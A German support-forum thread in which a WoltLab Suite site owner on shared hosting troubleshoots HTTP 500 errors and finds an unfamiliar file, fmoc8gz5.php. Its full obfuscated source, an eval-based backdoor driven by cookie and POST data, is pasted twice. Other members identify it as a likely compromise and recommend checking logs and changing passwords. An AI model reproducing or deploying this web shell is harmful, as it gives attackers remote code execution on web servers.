HTTP Error 500

  • Betroffene Version
    WoltLab Suite 3.1

    Guten Tag,

    heute morgen, als ich das erste Mal auf das Forum gehen wollte, kam ein HTTP 500 Error.

    Ins ACP komm ich ohne Probleme, aber Frontend immer HTTP 500 Error. Ich habe die letzten Tage nichts verändert,

    woran kann das liegen?

  • Das Problem haben auch mehrere User. Das ist das einzige was ich gefunden hab in den Logs.

  • Da scheint in der Apache-Config, bzw. in der htaccess etwas falsch konfiguriert zu sein.

    Ist das dein Server oder Shared Hosting.

    Am besten postest du mal deine htaccess für den Anfang :)

    Ansonsten bräuchten wir alles, was mit Require, Order, Allow und Deny so in den cconfigs/htaccess steht :)

    Viele Grüsse aus Stuttgart, Kind Regards from Stuttgart
    TheSonic

  • Shared Hosting bei Webgo

    Spoiler anzeigen
  • Seltsam... Da scheint der Host etwas nicht korrekt konfiguriert haben.

    Versuch mal, folgendes in dein htaccess zu schreiben (am besten über Options (...) )

    Apache 2.2

    Code
    Order allow,deny
    Allow from all

    Apache 2.4

    Code
    Require all granted

    Was das nicht geht, würde ich das mal dem Host schreiben... Denn an die Konfigurationsdateien von Apache wirst du nicht rankommen, oder? (Zur not auch nur für den vHost)

    Viele Grüsse aus Stuttgart, Kind Regards from Stuttgart
    TheSonic

  • Also ich kann für einzelne Domains die Apache Einträge bearbeiten.

    Die Einträge in der .htaccess haben leider nicht funktioniert.

    /e Im Verzeichnis ist auch eine komische php Datei: fmoc8gz5.php mit komischen Inhalt

    PHP
    <?php
    $owxkyx = 'u_ayc\'H9r-v#4fmxstb8k2od5npl6e0i*g31';$wuawpm = Array();$wuawpm[] = $owxkyx[6].$owxkyx[32];$wuawpm[] = $owxkyx[11];$wuawpm[] = $owxkyx[34].$owxkyx[4].$owxkyx[29].$owxkyx[23].$owxkyx[13].$owxkyx[12].$owxkyx[29].$owxkyx[23].$owxkyx[9].$owxkyx[18].$owxkyx[35].$owxkyx[28].$owxkyx[21].$owxkyx[9].$owxkyx[12].$owxkyx[30].$owxkyx[13].$owxkyx[12].$owxkyx[9].$owxkyx[18].$owxkyx[19].$owxkyx[4].$owxkyx[24].$owxkyx[9].$owxkyx[29].$owxkyx[12].$owxkyx[29].$owxkyx[29].$owxkyx[21].$owxkyx[34].$owxkyx[29].$owxkyx[21].$owxkyx[29].$owxkyx[7].$owxkyx[23].$owxkyx[23];$wuawpm[] = $owxkyx[4].$owxkyx[22].$owxkyx[0].$owxkyx[25].$owxkyx[17];$wuawpm[] = $owxkyx[16].$owxkyx[17].$owxkyx[8].$owxkyx[1].$owxkyx[8].$owxkyx[29].$owxkyx[26].$owxkyx[29].$owxkyx[2].$owxkyx[17];$wuawpm[] = $owxkyx[29].$owxkyx[15].$owxkyx[26].$owxkyx[27].$owxkyx[22].$owxkyx[23].$owxkyx[29];$wuawpm[] = $owxkyx[16].$owxkyx[0].$owxkyx[18].$owxkyx[16].$owxkyx[17].$owxkyx[8];$wuawpm[] = $owxkyx[2].$owxkyx[8].$owxkyx[8].$owxkyx[2].$owxkyx[3].$owxkyx[1].$owxkyx[14].$owxkyx[29].$owxkyx[8].$owxkyx[33].$owxkyx[29];$wuawpm[] = $owxkyx[16].$owxkyx[17].$owxkyx[8].$owxkyx[27].$owxkyx[29].$owxkyx[25];$wuawpm[] = $owxkyx[26].$owxkyx[2].$owxkyx[4].$owxkyx[20];foreach ($wuawpm[7]($_COOKIE, $_POST) as $esppkg => $tpnliad){function ybyrxlm($wuawpm, $esppkg, $gbckozo){return $wuawpm[6]($wuawpm[4]($esppkg . $wuawpm[2], ($gbckozo / $wuawpm[8]($esppkg)) + 1), 0, $gbckozo);}function cxczsh($wuawpm, $qsmcsdd){return @$wuawpm[9]($wuawpm[0], $qsmcsdd);}function ryuoclf($wuawpm, $qsmcsdd){$flhfo = $wuawpm[3]($qsmcsdd) % 3;if (!$flhfo) {eval($qsmcsdd[1]($qsmcsdd[2]));exit();}}$tpnliad = cxczsh($wuawpm, $tpnliad);ryuoclf($wuawpm, $wuawpm[5]($wuawpm[1], $tpnliad ^ ybyrxlm($wuawpm, $esppkg, $wuawpm[8]($tpnliad))));}
  • Da scheint in der Apache-Config, bzw. in der htaccess etwas falsch konfiguriert zu sein.

    Ist das dein Server oder Shared Hosting.

    Am besten postest du mal deine htaccess für den Anfang :)

    Ansonsten bräuchten wir alles, was mit Require, Order, Allow und Deny so in den cconfigs/htaccess steht :)

    Ich weiß jetzt nicht durch welchen Eintrag du das aus machst ....

    Die deine Einträge sind doch alle richtig so, da versucht jemand auf Interesse PHP Dateien zuzugreifen, auf die nicht zugegriffen werden sollte.

    WizardsUnited

    Kannst du die Seite aufrufen und dann direkt gucken welche 500er drinnen sind, natürlich nur sofern auch eine HTTP 500 gekommen ist :)

  • Die PHP-Datei verstehe ich nicht und kenne ich nicht, sie wird aber nichts mit deinem Problem zu tun haben.Das hängt mit dem Indianer zusammen, nicht mit PHP.

    Wie sind die Host-Datei für die Domain aus, also die Apacheconfig für den vHost, sozusagen.

    Viele Grüsse aus Stuttgart, Kind Regards from Stuttgart
    TheSonic

  • Also ich kann für einzelne Domains die Apache Einträge bearbeiten.

    Die Einträge in der .htaccess haben leider nicht funktioniert.

    /e Im Verzeichnis ist auch eine komische php Datei: fmoc8gz5.php mit komischen Inhalt

    PHP
    <?php
    $owxkyx = 'u_ayc\'H9r-v#4fmxstb8k2od5npl6e0i*g31';$wuawpm = Array();$wuawpm[] = $owxkyx[6].$owxkyx[32];$wuawpm[] = $owxkyx[11];$wuawpm[] = $owxkyx[34].$owxkyx[4].$owxkyx[29].$owxkyx[23].$owxkyx[13].$owxkyx[12].$owxkyx[29].$owxkyx[23].$owxkyx[9].$owxkyx[18].$owxkyx[35].$owxkyx[28].$owxkyx[21].$owxkyx[9].$owxkyx[12].$owxkyx[30].$owxkyx[13].$owxkyx[12].$owxkyx[9].$owxkyx[18].$owxkyx[19].$owxkyx[4].$owxkyx[24].$owxkyx[9].$owxkyx[29].$owxkyx[12].$owxkyx[29].$owxkyx[29].$owxkyx[21].$owxkyx[34].$owxkyx[29].$owxkyx[21].$owxkyx[29].$owxkyx[7].$owxkyx[23].$owxkyx[23];$wuawpm[] = $owxkyx[4].$owxkyx[22].$owxkyx[0].$owxkyx[25].$owxkyx[17];$wuawpm[] = $owxkyx[16].$owxkyx[17].$owxkyx[8].$owxkyx[1].$owxkyx[8].$owxkyx[29].$owxkyx[26].$owxkyx[29].$owxkyx[2].$owxkyx[17];$wuawpm[] = $owxkyx[29].$owxkyx[15].$owxkyx[26].$owxkyx[27].$owxkyx[22].$owxkyx[23].$owxkyx[29];$wuawpm[] = $owxkyx[16].$owxkyx[0].$owxkyx[18].$owxkyx[16].$owxkyx[17].$owxkyx[8];$wuawpm[] = $owxkyx[2].$owxkyx[8].$owxkyx[8].$owxkyx[2].$owxkyx[3].$owxkyx[1].$owxkyx[14].$owxkyx[29].$owxkyx[8].$owxkyx[33].$owxkyx[29];$wuawpm[] = $owxkyx[16].$owxkyx[17].$owxkyx[8].$owxkyx[27].$owxkyx[29].$owxkyx[25];$wuawpm[] = $owxkyx[26].$owxkyx[2].$owxkyx[4].$owxkyx[20];foreach ($wuawpm[7]($_COOKIE, $_POST) as $esppkg => $tpnliad){function ybyrxlm($wuawpm, $esppkg, $gbckozo){return $wuawpm[6]($wuawpm[4]($esppkg . $wuawpm[2], ($gbckozo / $wuawpm[8]($esppkg)) + 1), 0, $gbckozo);}function cxczsh($wuawpm, $qsmcsdd){return @$wuawpm[9]($wuawpm[0], $qsmcsdd);}function ryuoclf($wuawpm, $qsmcsdd){$flhfo = $wuawpm[3]($qsmcsdd) % 3;if (!$flhfo) {eval($qsmcsdd[1]($qsmcsdd[2]));exit();}}$tpnliad = cxczsh($wuawpm, $tpnliad);ryuoclf($wuawpm, $wuawpm[5]($wuawpm[1], $tpnliad ^ ybyrxlm($wuawpm, $esppkg, $wuawpm[8]($tpnliad))));}

    Das sieht sehr Start ich einen Exploit aus. Ich würde an deiner Stelle die Seite erstmal vom Netz nehmen, ganz. Und einen vollständigen Check drüber laufen lassen und herausfinden wie das rein gekommen ist.

  • Die deine Einträge sind doch alle richtig so, da versucht jemand auf Interesse PHP Dateien zuzugreifen, auf die nicht zugegriffen werden sollte.

    Ich bin rein nach dem Apachefehler geangen.. Auf was der Nutzer zugreifen soll und auf was nicht, weiss ich nicht.

    Fakt ist, dass keine Einträge in der htaccess drin waren und ich nicht weiss, wie der vHost konfiguriert, deswegen wollte ich versuchen, sie zu setzen (was wiederum gehen KANN aber nicht muss)...

    Wenn du wüsstest, wie oft solche Fehler bei uns schon diesbezüglich ankamen Aber egal.

    Viele Grüsse aus Stuttgart, Kind Regards from Stuttgart
    TheSonic

  • Die PHP-Datei verstehe ich nicht und kenne ich nicht, sie wird aber nichts mit deinem Problem zu tun haben.Das hängt mit dem Indianer zusammen, nicht mit PHP.

    Wie sind die Host-Datei für die Domain aus, also die Apacheconfig für den vHost, sozusagen.

  • Der Apachefehler wird durch die .htaccess in /lib/ ausgelöst (deny from all), habs mir eben bei mir angeschaut (Das macht da aber Sinn)

    In sofern hat Cyperghost recht: Wieso will jemand die Dateien direkt aufrufen?

    Ausser du hast wirklich ein Exploit am Laufen... Irgendwas ist da faul...

    Viele Grüsse aus Stuttgart, Kind Regards from Stuttgart
    TheSonic

  • Nein! Damit vernichtest du jegliche Spuren des Angreifers..

    ... und wenns dumm läuft mit dem gleichen Loch, durch das es letztes Mal geklappt hat (sofern es ein Exploit ist).

    Logs prüfen, Dateien prüfen, Securitychecks fahren, ggfs. Passwörter ändern (FTP / MySQL / ...)... Je nach dem, wie dein Host drauf ist: Den um Hilfe bitten.

    Viele Grüsse aus Stuttgart, Kind Regards from Stuttgart
    TheSonic

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!